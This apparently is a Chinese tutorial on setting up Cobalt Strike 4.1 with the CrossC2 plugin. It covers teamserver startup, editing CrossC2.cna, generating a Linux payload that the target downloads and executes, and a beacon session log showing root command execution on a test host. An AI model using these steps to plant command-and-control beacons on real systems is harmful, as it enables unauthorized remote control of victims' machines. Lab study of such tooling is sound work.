CobaltStrike4.1+CrossC2安装+上线Linux

cs客户端：Windows10;

服务器端：腾讯云服务器 Ubuntu20;ip 1.1.1.1 （假的）

测试靶机：腾讯云服务器-CentOS 7

 下载CrossC2

GitHub - gloxec/CrossC2: generate CobaltStrike's cross-platform payload

将src目录复制到win10客户端cs目录下

下载插件

https://github.com/gloxec/CrossC2/releases/download/v2.2.4/genCrossC2.Linux https://github.com/gloxec/CrossC2/releases/download/v2.2.4/genCrossC2.Win.zip

将genCrossC2.Linux文件上传到ubuntu服务器根目录下（有点文章说要的我就试着放上去先，反正也不差这点）

再将服务器端 隐藏文件.cobaltstrike.beacon_keys复制到客户端,ls -a 查看

解压genCrossC2.Win.zip文件，复制ucrtbased.dll到C:\Windows\System32目录下

编辑src下CrossC2.cna文件：

$CC2_PATH = "D:\\Tools\\CobaltStrike4.1\\src\\"; # <-------- fix   更改为CrossC2.cna存放的绝对路径
$CC2_BIN = "genCrossC2.Win.exe";                 #客户端使用的win10改成对应文件

sub genCrossC2 {     
        $dialog = dialog("CrossC2 Payload Generator", %(uri => "/a", lport => "55413", type => "curl", beaconKey => "./.cobaltstrike.beacon_keys", rebind_lib => "null", listener => "Listener: ", system => "System: ", arch => "Arch: ", payload_type => "Payload_Type: ", outputFileName => "CrossC2-test"), &dialogCallBack);
         #第212行 将最后的 outputFileName => "/tmp/CrossC2-test"改为 outputFileName => "CrossC2-test"
         #windows10不存在tmp目录所以将cs直接生成木马文件在根目录下

ubuntu@VM-0-9-ubuntu:~/CobaltStrike4.1$ ls -a
.   agscript      c2lint      cobaltstrike       cobaltstrike.bat           CobaltStrikeCN.jar  cobaltstrike.store  genCrossC2.Linux  peclone      teamserver      third-party
..  agscript.bat  c2lint.bat  cobaltstrike.auth  .cobaltstrike.beacon_keys  cobaltstrike.jar    data                logs              peclone.bat  teamserver.bat

CobaltStrike启动！！！

服务器启动：chmod +x teamserver #第一次启动给予权限

                sudo ./teamserver 1.1.1.1 password

                [*] Will use existing X509 certificate and keystore (for SSL)

                [+] Team server is up on 50050

                [*] SHA256 hash of SSL cert is:                 57fc0fac31c57fc0fac31c57fc0fac31c57fc0fac31c57fc0fac31c

                [!] Web Server will use default SSL certificate (you don't want this).

                        Use a valid SSL certificate with Cobalt Strike: https://www.cobaltstrike.com/help-malleable-c2#validssl

                [+] Listener: cs4.1 started!

客户端启动：双击cobaltstrike.bat文件一键启动

主机为服务器端地址，端口默认50050，用户名随便写，密码就刚刚写的password

右上角cobaltstrike -监听器 -最下面点击add添加监听器，因为CrossC2 listener 只支持https的

 cobalt strike -脚本管理器 - load CrossC2.cna文件名

 这时客户端顶上面会出现CrossC2按钮

点击CrossC2 -CrossC2 Payload Generator -genCrossC2 生成payload

第四行选择文件，选择cobaltstrike.beacon_keys的存放路径，listener改为刚刚添加的https监听器，Bulid生成

 复制语句到靶机执行

靶机自动下载并执行

查看日志，上线成功

08/10 11:58:56 *** new ssh session root *@10.0.4.7 (VM-4-7-centos(23687))

完成

进入beacon

ssh> sleep 0

[*] Tasked beacon to become interactive

[+] host called home, sent: 16 bytes

ssh> shell id

[*] Tasked session to run: id

[+] host called home, sent: 11 bytes

[+] received output:

uid=0(root) gid=0(root) 组=0(root)